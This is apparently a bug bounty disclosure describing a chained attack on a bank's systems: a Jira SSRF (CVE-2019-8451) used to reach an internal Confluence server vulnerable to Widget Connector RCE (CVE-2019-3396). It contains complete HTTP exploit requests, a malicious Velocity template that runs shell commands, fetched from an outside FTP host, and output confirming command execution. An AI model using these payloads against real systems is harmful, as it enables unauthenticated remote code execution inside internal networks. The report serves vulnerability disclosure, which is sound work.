This report describes a combination of two separate vulnerabilities in two separate services. This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the companyโs internal network.
Jira at https://jira.tochka.com is vulnerable to SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451.
Anyone on the internet can make it issue arbitrary HTTPS requests and read responses.
Moreover:
This allows an attacker to reach internal instance of Confluence https://confluence.bank24.int.
Confluence at https://confluence.bank24.int, uses a vulnerable version of a Widget Connector
plugin. This vulnerability leads to an RCE (CVE-2019-3396
).
There is an advisory by Atlassian. Also, there is a publicly known exploit to this vulnerability.
https://jira.tochka.com:[email protected]/
This bug could be used to send requests to an internal Confluence server https://confluence.bank24.int like so:
Request example:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]
Response snippet:
throw 1; < don't be evil' >{"https://jira.tochka.com:[email protected]":{"rc":200,"headers":{},"body":"<!DOCTYPE html>\n<html>\n<head>\n <title>ะ ะฐะฑะพัะธะน ััะพะป - Confluence<\/title>\n \n \n\n \n \n \n \n\n \n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=EDGE,chrome=IE7\">\n<meta charset=\"UTF-8\">\n<meta id=\"confluence-context-path\" name=\"confluence-context-path\" content=\"\">\n<meta id=\"confluence-base-url\" name=\"confluence-base-url\" content=\"https://confluence.bank24.int\">\n\n<meta id=\"atlassian-token\" name=\"atlassian-token\" content=\"f999fa99a5663c168e72b407eecdeec3695c70d0\">\n\n\n<script type=\"text/javascript\">\n var contextPath = '';\n<\/script>\n\n \n\n <meta name=\"confluence-request-time\" content=\"1571051898165\">\n \n \n \n <meta name=\"ajs-discovered-plugin-features\" content=\"$discoveredList\">\n <meta name=\"ajs-use-keyboard-shortcuts\" content=\"true\">\n <meta name=\"ajs-keyboardshortcut-hash\" content=\"97637bc20dfc7a1f15684630bc99897\">\n <meta id=\"team-calendars-has-jira-link\" content=\"true\">\n <meta name=\"ajs-team-calendars-display-time-format\" content=\"displayTimeFormat24\">\n <meta id=\"team-calendars-display-week-number\" content=\"false\">\n <meta
...
It looks that you have restrictions in place for outgoing HTTP and HTTPS requests, but not for FTP.
I set up an FTP server to serve a malicious template at ftp://68.183.67.159/qwe2.txt
File contents is:
#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
3232
It takes command
parameter, executes corresponding command and returns the result back.
To trigger this chain of vulnerabilities execute following request:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]/rest/tinymce/1/macro/preview&httpMethod=POST&headers=content-type%3Dapplication/json&postData={"contentId":"1","macro":{"body":"","params":{"url":"https://www.youtube.com/watch?v=y6sOtXOvchY","_template":"ftp://68.183.67.159/qwe2.txt","command":"id"},"name":"widget"}}
It makes Jira to send a macro preview request to the Confluence. Confluence then fetches a template from FTP server and executes id
command
Response snippet:
...
<div>\n uid=502(confluence) gid=502(confluence) groups=502(confluence) context=unconfined_u:system_r:initrc_t:s0\n\r\n3232\r\n\n <\/div>\n
...
You may change command
parameter to your liking.
Widget Connector
plugin version 3.1.4 or higher.This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the companyโs internal network.